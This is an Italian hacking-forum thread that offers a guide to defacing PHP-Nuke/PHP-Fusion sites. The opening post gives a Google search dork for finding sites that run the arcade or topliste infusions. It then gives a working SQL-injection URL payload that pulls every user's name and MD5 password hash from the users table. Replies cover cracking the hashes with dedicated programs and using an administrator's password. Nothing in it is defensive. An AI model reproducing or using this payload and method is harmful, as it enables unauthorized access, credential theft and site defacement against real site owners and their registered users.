Deface Sito PHP Nuke

[SteVo666]

Ne io ne lo Staff Ci Prendiamo la Responsabilità Delle vostre Azioni​

Quasi tutti i siti sono patchati, una falla però che resta ancora presente è quella in quei siti php nuke che sfruttano /infusions/arcade/ o /infusions/topliste. Defacciare siti come questi è fin troppo facile, a causa di un errore nel server mySQL (se non erro, ma potrei ovviamente sbagliarmi). Basta scrivere su google:
allinurl:/infusions/arcade/

Cercare, e alla fine del link (

Perfavore, Entra oppure Registrati per vedere i Link!

) aggiungere
infusions/arcade/index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/*

Se l'errore non è stato patchato verranno scritte come "error my SQL", e le password in MD5 di tutti gli utenti registrati, che basterà decriptate. Le versioni più a rischio sono quelle tra 2003-2005.

[INFO]Fonte: tuttocomputer.forumfree.net[/INFO]

 

[Invisible]

Bravo cosi qualche lamerozzo ci prova.

 

[DoomMark]

ehm... che cosa sarebbe allinurl xD cmq bella idea... se diresti anche come decriptare le pass degli utenti xD

 

[TRANZOLLO]

Decriptarle è quasi impossibile...
e comunque anche avendo la password non si risolve molto.

 

[ribelle]

@Tranzollo: Se prendi la Password di un Admin vedi a cosa serve qwe
@DoomMark: Ci sono dei programmi appositi per decriptare password

Buona Guida Anche Se Come Hai Detto Funziona Solo Con Versione 2003-2005 Per Questo E' Molto Improbabile Riuscirci!

 

[SteVo666]

ehm... che cosa sarebbe allinurl

vuol dire che dentro la barra di ricerca devi mettere...

 

[Reatino]

Bella guida. La prossima volta Stevo voglio vedere qualcosa di tuo xD

 

[SteVo666]

Bella guida. La prossima volta Stevo voglio vedere qualcosa di tuo xD

Neh ti dico solo una cosa, io di guide posso farne molte... ma pultroppo sono state gia postate.
Poi visto che fai cosi non postero piu niente e vedremo chi vi potra dare altre guide che mai nessuno ha pensato di postare